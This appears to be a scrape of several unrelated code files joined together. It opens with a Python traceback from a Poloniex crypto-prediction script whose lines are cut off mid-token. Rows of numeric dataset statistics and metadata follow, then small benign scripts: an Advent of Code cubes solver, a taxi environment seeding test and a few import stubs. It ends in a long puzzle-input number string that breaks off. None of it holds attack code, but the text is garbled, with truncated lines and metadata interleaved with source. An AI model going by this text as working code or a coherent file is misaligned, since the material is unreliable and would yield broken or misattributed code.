File "/usr/local/lib/python3.5/dist-packages/requests/sessions.py",t
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/sessions.py",d
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/adapters.py",d
raise ConnectionError(e, request=request)
requests.exceptions.ConnectionError: HTTPSConnectionPool(host='poloni)
[ConnectionError(MaxRetryError("HTTPSConnectionPool(host='poloniex.co]
Exception in thread Thread-14:
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/urllib3/connection.py"n
(self.host, self.port), self.timeout, **extra_kw)
File "/usr/local/lib/python3.5/dist-packages/urllib3/util/connection
for res in socket.getaddrinfo(host, port, family, socket.SOCK_STR:
File "/usr/lib/python3.5/socket.py", line 732, in getaddrinfo
for res in _socket.getaddrinfo(host, port, family, type, proto, f:
socket.gaierror: [Errno -3] Temporary failure in name resolution
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpooln
chunked=chunked)
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpoolt
self._validate_conn(conn)
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpooln
conn.connect()
File "/usr/local/lib/python3.5/dist-packages/urllib3/connection.py"t
conn = self._new_conn()
File "/usr/local/lib/python3.5/dist-packages/urllib3/connection.py"n
self, "Failed to establish a new connection: %s" % e)
urllib3.exceptions.NewConnectionError: <urllib3.connection.VerifiedHTn
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/requests/adapters.py",d
timeout=timeout
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpooln
_stacktrace=sys.exc_info()[2])
File "/usr/local/lib/python3.5/dist-packages/urllib3/util/retry.py"t
raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='poloniex.)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/lib/python3.5/threading.py", line 914, in _bootstrap_innr
self.run()
File "/usr/lib/python3.5/threading.py", line 862, in run
self._target(*self._args, **self._kwargs)
File "/home/nate/github/crypto_predict_latest/crypto_predict/code/pg
Poloniex allows 6 calls/second before your IP is banned.
File "/home/nate/github/crypto_predict_latest/crypto_predict/code/ps
File "/home/nate/github/crypto_predict_latest/crypto_predict/code/ps
full depth
File "/usr/local/lib/python3.5/dist-packages/poloniex/__init__.py",k
'depth': str(depth)
File "/usr/local/lib/python3.5/dist-packages/poloniex/__init__.py",g
return func(*args, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/poloniex/__init__.py",_
ret = _get(**payload)
File "/usr/local/lib/python3.5/dist-packages/requests/api.py", linet
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/api.py", linet
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/sessions.py",t
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/sessions.py",d
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/adapters.py",d
raise ConnectionError(e, request=request)
requests.exceptions.ConnectionError: HTTPSConnectionPool(host='poloni)
| 50.480702 | 70 | 0.757628 | 2,063 | 14,387 | 5.223461 | 0.073679 | 0.060412 | 0.094933 | 0.11971 | 0.977635 | 0.977635 | 0.977635 | 0.977635 | 0.97216 | 0.97216 | 0 | 0.022715 | 0.106485 | 14,387 | 284 | 71 | 50.658451 | 0.815558 | 0 | 0 | 0.948819 | 0 | 0.098425 | 0.28074 | 0.262112 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8d88e514dc4c25069bc8af6e7e8423a588c68861 | 693 | py | Python | domains/gym_taxi/tests/reproducability.py | AndrewPaulChester/sage-code | 9fe676bfbcbc6f642eca29b30a1027fba2a426a0 | [
"MIT"
] | null | null | null | domains/gym_taxi/tests/reproducability.py | AndrewPaulChester/sage-code | 9fe676bfbcbc6f642eca29b30a1027fba2a426a0 | [
"MIT"
] | null | null | null | domains/gym_taxi/tests/reproducability.py | AndrewPaulChester/sage-code | 9fe676bfbcbc6f642eca29b30a1027fba2a426a0 | [
"MIT"
] | null | null | null | from domains.gym_taxi.envs import taxi_env
import time
import numpy as np
# np.random.seed(1)
# print(np.random.randint(6))
# print(np.random.randint(6))
# print(np.random.randint(6))
# print(np.random.randint(6))
# np.random.seed(1)
# print(np.random.randint(6))
# print(np.random.randint(6))
# print(np.random.randint(6))
# print(np.random.randint(6))
# np.random.seed(2)
# print(np.random.randint(6))
# print(np.random.randint(6))
# print(np.random.randint(6))
# print(np.random.randint(6))
env = taxi_env.JsonTaxiEnv("mixed", "predictable")
# env.reset()
# env.render()
# env.render()
# time.sleep(2)
# env.reset()
env.seed(1)
env.reset()
env.render()
env.render()
time.sleep(20)
| 17.769231 | 50 | 0.692641 | 115 | 693 | 4.147826 | 0.217391 | 0.251572 | 0.327044 | 0.503145 | 0.754717 | 0.754717 | 0.754717 | 0.754717 | 0.607966 | 0.607966 | 0 | 0.0304 | 0.098124 | 693 | 38 | 51 | 18.236842 | 0.7328 | 0.65368 | 0 | 0.222222 | 0 | 0 | 0.073395 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 8 |
570015042da1184e500abb62c5004cc6d759cd0b | 199 | py | Python | whatistheplan/models/__init__.py | Cookie150CC/whatistheplan.com | bcee8f769a0e820b4bc8f619b3fb118fd6f1e68c | [
"MIT"
] | 5 | 2015-04-06T16:56:20.000Z | 2017-03-27T15:34:12.000Z | whatistheplan/models/__init__.py | Cookie150CC/whatistheplan.com | bcee8f769a0e820b4bc8f619b3fb118fd6f1e68c | [
"MIT"
] | 48 | 2015-04-03T23:15:42.000Z | 2018-10-05T19:08:50.000Z | whatistheplan/models/__init__.py | Cookie150CC/whatistheplan.com | bcee8f769a0e820b4bc8f619b3fb118fd6f1e68c | [
"MIT"
] | 7 | 2015-04-10T20:50:17.000Z | 2018-09-07T18:28:09.000Z | """Aggregate all database classes for easy importing"""
from whatistheplan.models.userprofile import UserProfile
from whatistheplan.models.game import Game
from whatistheplan.models.team import Team
| 39.8 | 56 | 0.844221 | 25 | 199 | 6.72 | 0.56 | 0.303571 | 0.410714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.095477 | 199 | 4 | 57 | 49.75 | 0.933333 | 0.246231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
f509d5a1463b80de35df698cdc839503206f0623 | 66 | py | Python | tests/t5.py | jplevyak/pyc | 9f4bc49be78ba29427841460945ce63826fcd857 | [
"BSD-3-Clause"
] | 3 | 2019-08-21T22:01:35.000Z | 2021-07-25T00:21:28.000Z | tests/t5.py | jplevyak/pyc | 9f4bc49be78ba29427841460945ce63826fcd857 | [
"BSD-3-Clause"
] | null | null | null | tests/t5.py | jplevyak/pyc | 9f4bc49be78ba29427841460945ce63826fcd857 | [
"BSD-3-Clause"
] | null | null | null | print 1 + 2
print 2 - 1
print 2 * 2
print -1
print -(-1)
print ~1
| 9.428571 | 11 | 0.590909 | 15 | 66 | 2.6 | 0.2 | 0.615385 | 0.564103 | 0.615385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1875 | 0.272727 | 66 | 6 | 12 | 11 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
f56943657c33c5e8316add28848cfbd4fddae1e4 | 111 | py | Python | boa3_test/test_sc/interop_test/runtime/InvocationCounter.py | hal0x2328/neo3-boa | 6825a3533384cb01660773050719402a9703065b | [
"Apache-2.0"
] | 25 | 2020-07-22T19:37:43.000Z | 2022-03-08T03:23:55.000Z | boa3_test/test_sc/interop_test/runtime/InvocationCounter.py | hal0x2328/neo3-boa | 6825a3533384cb01660773050719402a9703065b | [
"Apache-2.0"
] | 419 | 2020-04-23T17:48:14.000Z | 2022-03-31T13:17:45.000Z | boa3_test/test_sc/interop_test/runtime/InvocationCounter.py | hal0x2328/neo3-boa | 6825a3533384cb01660773050719402a9703065b | [
"Apache-2.0"
] | 15 | 2020-05-21T21:54:24.000Z | 2021-11-18T06:17:24.000Z | from boa3.builtin.interop.runtime import invocation_counter
def Main() -> int:
return invocation_counter
| 18.5 | 59 | 0.783784 | 14 | 111 | 6.071429 | 0.857143 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010526 | 0.144144 | 111 | 5 | 60 | 22.2 | 0.884211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
f58794cf9bf98e493a3a35302bab8601d4799839 | 190 | py | Python | iotbx/command_line/reflection_file_editor.py | dperl-sol/cctbx_project | b9e390221a2bc4fd00b9122e97c3b79c632c6664 | [
"BSD-3-Clause-LBNL"
] | 155 | 2016-11-23T12:52:16.000Z | 2022-03-31T15:35:44.000Z | iotbx/command_line/reflection_file_editor.py | dperl-sol/cctbx_project | b9e390221a2bc4fd00b9122e97c3b79c632c6664 | [
"BSD-3-Clause-LBNL"
] | 590 | 2016-12-10T11:31:18.000Z | 2022-03-30T23:10:09.000Z | iotbx/command_line/reflection_file_editor.py | dperl-sol/cctbx_project | b9e390221a2bc4fd00b9122e97c3b79c632c6664 | [
"BSD-3-Clause-LBNL"
] | 115 | 2016-11-15T08:17:28.000Z | 2022-02-09T15:30:14.000Z | from __future__ import absolute_import, division, print_function
import sys
from iotbx import reflection_file_editor
if __name__ == "__main__" :
reflection_file_editor.run(sys.argv[1:])
| 23.75 | 64 | 0.810526 | 26 | 190 | 5.230769 | 0.692308 | 0.205882 | 0.294118 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005952 | 0.115789 | 190 | 7 | 65 | 27.142857 | 0.803571 | 0 | 0 | 0 | 0 | 0 | 0.042105 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0.2 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
1961f9b770d13814d3cde43fc000846f59887ef3 | 102 | py | Python | execute_517/__init__.py | Cadair/execute-517 | f57b05ceda3caf5f34b0790260b14604b60f583a | [
"BSD-3-Clause"
] | null | null | null | execute_517/__init__.py | Cadair/execute-517 | f57b05ceda3caf5f34b0790260b14604b60f583a | [
"BSD-3-Clause"
] | 2 | 2020-11-10T13:31:09.000Z | 2020-11-10T14:54:11.000Z | execute_517/__init__.py | Cadair/execute-517 | f57b05ceda3caf5f34b0790260b14604b60f583a | [
"BSD-3-Clause"
] | null | null | null | from .version import __version__
from .run import run_python_in_env
__all__ = ['run_python_in_env']
| 17 | 34 | 0.803922 | 16 | 102 | 4.25 | 0.5 | 0.264706 | 0.323529 | 0.411765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.127451 | 102 | 5 | 35 | 20.4 | 0.764045 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
198779f7a1fa7bbbc94dfcd521af04b52b5f0a53 | 6,109 | py | Python | 2020/Day17/Cubes.py | dh256/adventofcode | 428eec13f4cbf153333a0e359bcff23070ef6d27 | [
"MIT"
] | null | null | null | 2020/Day17/Cubes.py | dh256/adventofcode | 428eec13f4cbf153333a0e359bcff23070ef6d27 | [
"MIT"
] | null | null | null | 2020/Day17/Cubes.py | dh256/adventofcode | 428eec13f4cbf153333a0e359bcff23070ef6d27 | [
"MIT"
] | null | null | null | class Cubes:
# get active cubes
# range is the min-1 to nax-1 for each dimension
def ranges(self):
active_cubes = [item[0] for item in list(filter(lambda i:i[1],self.grid.items()))]
min_x = min(active_cubes,key=lambda i:i[0])[0]
max_x = max(active_cubes,key=lambda i:i[0])[0]
min_y = min(active_cubes,key=lambda i:i[1])[1]
max_y = max(active_cubes,key=lambda i:i[1])[1]
min_z = min(active_cubes,key=lambda i:i[2])[2]
max_z = max(active_cubes,key=lambda i:i[2])[2]
return (min_x-1,max_x+1,min_y-1,max_y+1,min_z-1,max_z+1)
def __init__(self,filename) -> None:
self.grid = {} # grid - key is coord of cube, value is state (False, inactive; True, active)
with open(filename,"r") as input_file:
initial_grid_points = [line.strip('\n') for line in input_file]
x = 0
y = 0
z = 0
for row in initial_grid_points:
x = 0
for c in row:
self.grid[(x,y,z)] = c == '#'
x += 1
y += 1
def get_neighbours(self,coord):
neighbours = [(x,y,z) for x in range(coord[0]-1,coord[0]+2) for y in range(coord[1]-1,coord[1]+2) for z in range(coord[2]-1,coord[2]+2)]
# make sure they are all in the grid
for neighbour in neighbours:
if neighbour not in self.grid.keys():
self.grid[neighbour] = False
# remove actual coord
neighbours.remove(coord)
return neighbours
def cycle(self,cycles):
# Go through neighbours, if active count; if inactive get all its neighbours and count active, if 3 active add to switch_list (for active cubes if active count is 2 or 3 add to switch_list)
# Repeat cycle number of times
for cycle in range(0,cycles):
# get all active cubes
switch_list = [] # contains the co-ords of all cubes to switch
ranges = self.ranges()
# for each cube - get neighbours
for x in range(ranges[0],ranges[1]+1):
for y in range(ranges[2],ranges[3]+1):
for z in range(ranges[4],ranges[5]+1):
neighbours = self.get_neighbours((x,y,z))
active_neighbours = len([n for n in neighbours if self.grid[n]])
if (self.grid[(x,y,z)] and active_neighbours not in (2,3)) or (not self.grid[(x,y,z)] and active_neighbours == 3):
switch_list.append((x,y,z))
for cube in switch_list:
if not cube in self.grid.keys():
self.grid[cube] = False
self.grid[cube] = not self.grid[cube]
# return number of active cubes
return len(list(filter(lambda v:v,self.grid.values())))
class Cubes2:
# get active cubes
# range is the min-1 to nax-1 for each dimension
def ranges(self):
active_cubes = [item[0] for item in list(filter(lambda i:i[1],self.grid.items()))]
min_x = min(active_cubes,key=lambda i:i[0])[0]
max_x = max(active_cubes,key=lambda i:i[0])[0]
min_y = min(active_cubes,key=lambda i:i[1])[1]
max_y = max(active_cubes,key=lambda i:i[1])[1]
min_z = min(active_cubes,key=lambda i:i[2])[2]
max_z = max(active_cubes,key=lambda i:i[2])[2]
min_w = min(active_cubes,key=lambda i:i[3])[3]
max_w = max(active_cubes,key=lambda i:i[3])[3]
return (min_x-1,max_x+1,min_y-1,max_y+1,min_z-1,max_z+1,min_w-1,max_w+1)
def __init__(self,filename) -> None:
self.grid = {} # grid - key is coord of cube, value is state (False, inactive; True, active)
with open(filename,"r") as input_file:
initial_grid_points = [line.strip('\n') for line in input_file]
x = 0
y = 0
z = 0
w = 0
for row in initial_grid_points:
x = 0
for c in row:
self.grid[(x,y,z,w)] = c == '#'
x += 1
y += 1
def get_neighbours(self,coord):
neighbours = [(x,y,z,w) for x in range(coord[0]-1,coord[0]+2) for y in range(coord[1]-1,coord[1]+2) for z in range(coord[2]-1,coord[2]+2) for w in range(coord[3]-1,coord[3]+2)]
# make sure they are all in the grid
for neighbour in neighbours:
if neighbour not in self.grid.keys():
self.grid[neighbour] = False
# remove actual coord
neighbours.remove(coord)
return neighbours
def cycle(self,cycles):
# Go through neighbours, if active count; if inactive get all its neighbours and count active, if 3 active add to switch_list (for active cubes if active count is 2 or 3 add to switch_list)
# Repeat cycle number of times
for cycle in range(0,cycles):
# get all active cubes
switch_list = [] # contains the co-ords of all cubes to switch
ranges = self.ranges()
# for each cube - get neighbours
for x in range(ranges[0],ranges[1]+1):
for y in range(ranges[2],ranges[3]+1):
for z in range(ranges[4],ranges[5]+1):
for w in range(ranges[6],ranges[7]+1):
neighbours = self.get_neighbours((x,y,z,w))
active_neighbours = len([n for n in neighbours if self.grid[n]])
if (self.grid[(x,y,z,w)] and active_neighbours not in (2,3)) or (not self.grid[(x,y,z,w)] and active_neighbours == 3):
switch_list.append((x,y,z,w))
for cube in switch_list:
if not cube in self.grid.keys():
self.grid[cube] = False
self.grid[cube] = not self.grid[cube]
# return number of active cubes
return len(list(filter(lambda v:v,self.grid.values())))
| 44.591241 | 197 | 0.543133 | 943 | 6,109 | 3.42948 | 0.101803 | 0.064317 | 0.039579 | 0.08658 | 0.972789 | 0.971861 | 0.971552 | 0.969697 | 0.935993 | 0.935374 | 0 | 0.031412 | 0.33819 | 6,109 | 137 | 198 | 44.591241 | 0.768489 | 0.176625 | 0 | 0.8125 | 0 | 0 | 0.001597 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5ff85b78082b4439aba47027801b0952f89e55f9 | 33,068 | py | Python | 2018/Day08.py | hrmorley34/AdventofCode | 74590422717fb5c6b80ef3fca226359d354c4aec | [
"MIT"
] | null | null | null | 2018/Day08.py | hrmorley34/AdventofCode | 74590422717fb5c6b80ef3fca226359d354c4aec | [
"MIT"
] | null | null | null | 2018/Day08.py | hrmorley34/AdventofCode | 74590422717fb5c6b80ef3fca226359d354c4aec | [
"MIT"
] | null | null | null | numbers = "8 11 6 2 4 3 3 6 1 5 0 7 1 8 5 2 4 1 1 1 1 3 2 1 1 9 0 7 6 6 1 4 1 2 2 1 1 3 3 2 2 1 1 1 1 6 0 10 4 7 5 5 3 3 8 4 4 1 1 3 1 2 1 1 4 5 3 2 3 5 3 4 1 9 0 9 8 7 1 2 3 1 9 1 3 1 3 1 2 3 2 1 3 2 1 9 0 10 5 2 7 8 7 9 6 3 8 1 1 3 3 3 3 1 2 1 2 1 5 0 8 4 4 8 2 2 7 4 1 2 1 2 3 1 3 3 2 3 3 7 1 9 0 10 9 3 1 4 8 9 2 6 7 4 1 3 1 1 3 3 3 1 3 1 7 0 6 8 7 6 3 4 1 1 1 1 1 1 2 1 1 7 0 8 1 9 5 2 2 1 1 5 3 3 1 3 3 2 2 5 2 4 1 5 4 2 3 5 1 6 0 6 1 5 2 1 8 5 1 3 1 1 1 3 1 8 0 10 4 3 1 7 1 8 6 9 9 9 1 1 1 1 2 3 1 2 1 7 0 11 2 3 1 2 3 5 2 5 1 2 4 2 2 1 1 2 1 2 1 4 1 1 1 4 2 1 4 5 3 5 1 8 0 6 3 6 6 8 1 9 1 1 2 1 3 1 2 3 1 8 0 6 4 9 5 1 6 1 2 2 1 2 2 3 2 2 1 5 0 10 7 5 3 1 9 8 1 5 6 4 3 1 3 1 3 3 2 3 2 1 3 5 1 8 0 9 7 6 1 3 3 1 1 8 7 1 1 1 3 2 1 3 1 1 5 0 11 4 3 1 4 1 7 7 7 9 6 6 3 1 1 1 1 1 5 0 6 1 2 3 1 4 9 3 1 2 3 2 4 4 2 4 5 3 5 1 6 0 10 1 2 5 1 8 1 1 7 6 7 1 2 2 1 1 1 1 7 0 10 8 9 7 8 1 2 1 5 3 5 1 3 1 1 1 3 1 1 6 0 7 7 8 7 1 9 7 1 3 1 3 3 3 1 4 4 4 3 2 3 4 1 5 0 6 7 7 1 6 4 2 1 1 2 1 3 1 6 0 7 4 3 4 1 2 4 6 3 2 3 1 1 3 1 8 0 6 8 8 4 1 1 1 3 1 3 3 3 3 1 1 1 5 5 3 3 6 1 2 1 5 3 3 7 1 6 0 8 3 1 2 9 1 6 8 1 1 3 2 2 3 1 1 5 0 11 1 2 3 4 1 4 9 8 4 6 9 1 3 2 2 1 1 9 0 8 1 6 6 5 4 9 1 2 1 2 1 3 1 2 1 1 3 3 3 3 1 3 1 3 3 4 1 7 0 6 9 1 1 4 1 3 1 2 1 3 3 1 1 1 7 0 10 8 5 5 1 2 3 6 9 9 1 3 1 3 2 3 2 3 1 5 0 9 9 4 1 1 8 3 8 5 3 1 1 2 1 1 1 1 2 5 3 6 1 7 0 9 8 4 1 9 1 9 2 2 1 3 2 1 2 3 3 3 1 6 0 8 9 2 8 7 9 5 1 1 1 3 2 2 1 2 1 6 0 9 5 5 9 5 6 9 3 1 7 3 1 3 1 3 3 4 1 1 1 5 3 3 7 1 6 0 7 4 6 1 1 2 2 7 1 1 3 2 3 1 1 5 0 9 6 9 2 7 3 3 1 5 7 3 1 2 1 3 1 5 0 9 5 6 5 8 6 1 8 2 8 1 1 2 3 3 2 2 4 5 5 3 4 3 5 1 8 0 10 1 3 2 3 1 1 3 8 8 4 1 1 2 2 3 3 2 2 1 5 0 8 3 6 7 8 1 4 5 3 2 1 2 1 1 1 9 0 8 3 2 3 7 9 1 1 1 2 3 2 2 2 1 3 1 3 4 2 2 3 3 2 6 4 5 4 3 5 1 5 0 11 7 9 3 1 3 8 5 9 9 2 6 2 1 3 2 3 1 9 0 9 1 4 1 1 4 8 8 1 1 2 1 2 1 3 3 1 3 3 1 5 0 10 7 8 7 5 6 3 5 2 3 1 1 1 1 3 3 5 2 4 1 5 3 7 1 7 0 9 7 7 2 6 1 5 6 6 6 3 3 1 3 2 1 3 1 9 0 11 1 5 7 4 2 8 3 2 8 9 7 1 2 3 2 2 3 3 1 2 1 9 0 10 6 3 3 8 2 1 7 3 9 8 1 3 3 1 2 1 2 1 1 3 1 2 4 3 5 2 3 6 1 7 0 8 9 2 8 4 9 1 8 4 2 2 3 2 2 1 1 1 5 0 7 7 7 1 9 8 8 9 2 2 1 1 3 1 5 0 8 9 4 4 4 2 8 4 1 1 3 1 1 2 2 1 5 2 5 3 3 5 1 8 0 6 7 9 1 6 3 4 2 1 3 1 2 1 1 2 1 7 0 6 9 1 3 8 1 2 3 1 2 2 3 2 2 1 7 0 6 5 7 1 1 3 1 1 2 1 1 2 3 1 1 3 1 3 4 3 7 1 8 0 8 6 2 7 7 9 1 2 4 2 2 3 2 1 2 1 3 1 8 0 7 6 8 4 7 1 1 1 2 2 1 2 1 1 1 3 1 6 0 11 1 8 9 8 3 6 7 6 5 8 2 2 1 2 1 1 3 2 5 1 1 3 3 1 4 6 1 2 4 5 3 5 1 5 0 6 1 6 2 9 4 1 1 1 1 3 2 1 7 0 11 7 9 8 5 1 8 1 2 8 6 1 1 2 3 1 1 3 1 1 8 0 6 5 7 7 8 1 2 3 2 2 1 2 1 2 3 3 4 4 1 5 3 5 1 5 0 11 1 7 6 1 3 7 8 3 6 5 1 2 1 2 3 1 1 7 0 10 4 4 1 4 7 7 7 8 7 7 3 1 3 2 2 1 3 1 7 0 6 7 9 4 7 1 4 2 1 1 1 1 2 1 1 1 3 4 3 3 4 1 5 0 11 6 4 3 3 1 1 3 8 1 5 2 1 3 1 3 2 1 8 0 7 6 9 8 7 1 1 5 1 3 1 1 3 1 3 2 1 5 0 8 8 6 7 8 9 1 5 6 2 2 2 1 1 3 5 2 3 3 5 1 9 0 9 1 5 1 7 7 6 1 1 2 3 1 2 3 2 1 3 3 1 1 6 0 9 1 3 5 4 1 1 6 5 7 1 2 3 2 1 2 1 9 0 8 3 5 1 8 2 1 1 1 2 3 1 3 2 2 2 3 2 4 1 1 2 3 4 2 4 4 5 5 5 3 7 1 8 0 6 3 6 4 5 2 1 2 1 3 1 2 2 1 1 1 9 0 9 8 1 8 8 1 6 3 5 5 1 1 1 1 3 1 3 1 3 1 9 0 11 6 1 8 5 1 7 3 6 7 9 2 1 2 1 3 2 1 3 1 1 3 3 3 2 5 3 3 3 4 1 7 0 8 6 3 9 8 1 5 8 4 3 1 3 1 1 3 1 1 7 0 10 9 3 1 4 5 5 5 9 7 6 1 3 2 2 2 1 3 1 7 0 7 4 3 6 1 8 1 9 1 3 1 3 3 1 2 2 4 3 3 3 7 1 6 0 8 2 6 8 3 5 1 1 1 1 1 1 3 2 1 1 9 0 7 8 2 9 7 6 2 1 2 1 3 1 1 1 3 2 3 1 8 0 6 2 7 1 7 8 9 2 1 3 1 1 1 2 1 1 2 2 1 1 4 1 3 4 1 7 0 10 3 2 9 1 3 9 9 4 1 3 1 3 3 3 3 1 2 1 7 0 10 1 3 6 4 2 9 3 1 4 1 1 2 2 3 3 2 1 1 9 0 10 2 6 6 9 5 3 6 1 9 8 1 1 1 3 1 1 2 1 3 3 4 5 3 3 6 1 7 0 7 1 9 1 4 6 2 7 1 1 2 2 1 1 2 1 8 0 11 5 9 5 6 4 1 1 8 7 7 9 1 2 3 2 1 2 1 1 1 6 0 10 1 9 8 9 8 7 8 1 1 9 1 1 1 2 2 1 2 1 1 4 2 1 6 5 2 1 2 5 8 6 3 5 4 3 5 1 9 0 6 7 5 1 2 1 6 2 3 1 2 2 2 3 1 1 1 5 0 6 6 8 4 2 1 3 1 1 1 3 1 1 6 0 8 1 9 8 4 1 4 4 8 3 3 1 3 1 3 4 2 3 4 4 3 4 1 6 0 8 8 1 7 7 2 6 1 8 1 2 1 3 3 1 1 7 0 6 1 4 9 3 9 8 3 1 2 2 3 2 1 1 7 0 10 6 1 3 1 5 1 3 5 5 1 1 3 2 1 2 3 1 2 2 1 2 3 5 1 9 0 7 9 8 2 1 3 9 3 2 2 1 2 2 3 1 1 3 1 7 0 8 5 8 5 1 7 6 6 6 1 2 3 1 2 1 1 1 8 0 7 5 1 6 2 7 6 7 1 1 1 2 2 3 1 3 1 2 4 1 5 3 5 1 8 0 7 8 6 3 3 4 1 8 2 3 3 1 1 1 1 3 1 8 0 6 8 1 9 9 4 1 1 3 1 3 2 1 3 3 1 9 0 6 6 6 2 1 9 3 2 3 1 2 1 1 3 1 1 3 3 1 4 4 3 4 1 6 0 8 2 7 7 8 2 8 1 1 1 1 1 1 3 2 1 9 0 6 9 9 8 1 2 6 1 3 3 3 1 1 2 3 2 1 9 0 8 1 6 9 6 8 9 4 9 3 1 1 1 3 1 1 3 1 3 3 2 2 2 6 6 3 5 3 3 4 1 9 0 11 7 9 1 6 2 1 8 9 3 2 3 1 2 2 1 1 3 1 2 2 1 8 0 7 2 6 3 2 3 1 1 3 3 1 1 1 3 2 1 1 6 0 8 3 9 5 1 2 9 4 3 2 3 1 1 2 3 4 5 4 2 3 5 1 5 0 6 5 1 3 5 1 5 3 3 2 1 1 1 5 0 9 1 1 6 2 6 3 4 1 7 2 3 3 3 1 1 6 0 11 3 7 2 1 7 6 6 1 2 5 7 1 1 3 2 1 2 1 1 2 5 1 3 5 1 6 0 11 3 9 7 1 2 1 9 7 3 4 8 1 2 2 1 1 1 1 6 0 7 4 9 9 4 2 1 2 2 2 1 3 1 3 1 7 0 10 9 9 8 8 1 6 6 6 7 3 3 3 3 2 1 1 1 4 2 4 1 3 3 6 1 9 0 8 1 3 5 5 5 6 8 7 1 1 1 2 3 3 1 3 3 1 6 0 6 1 7 8 8 9 1 2 1 1 3 1 3 1 6 0 9 1 1 1 1 2 4 5 3 4 2 1 1 1 3 1 3 4 4 2 1 3 3 6 1 7 0 7 2 6 1 7 3 1 4 3 3 3 1 1 1 1 1 5 0 9 2 4 3 1 3 8 7 7 8 1 3 1 1 2 1 6 0 8 5 9 5 9 1 3 8 8 2 1 2 2 2 3 4 1 4 2 4 5 5 3 2 5 3 3 4 1 6 0 10 5 2 1 3 1 8 6 1 3 7 3 2 1 2 2 1 1 6 0 10 1 7 4 7 6 5 1 8 8 3 3 2 1 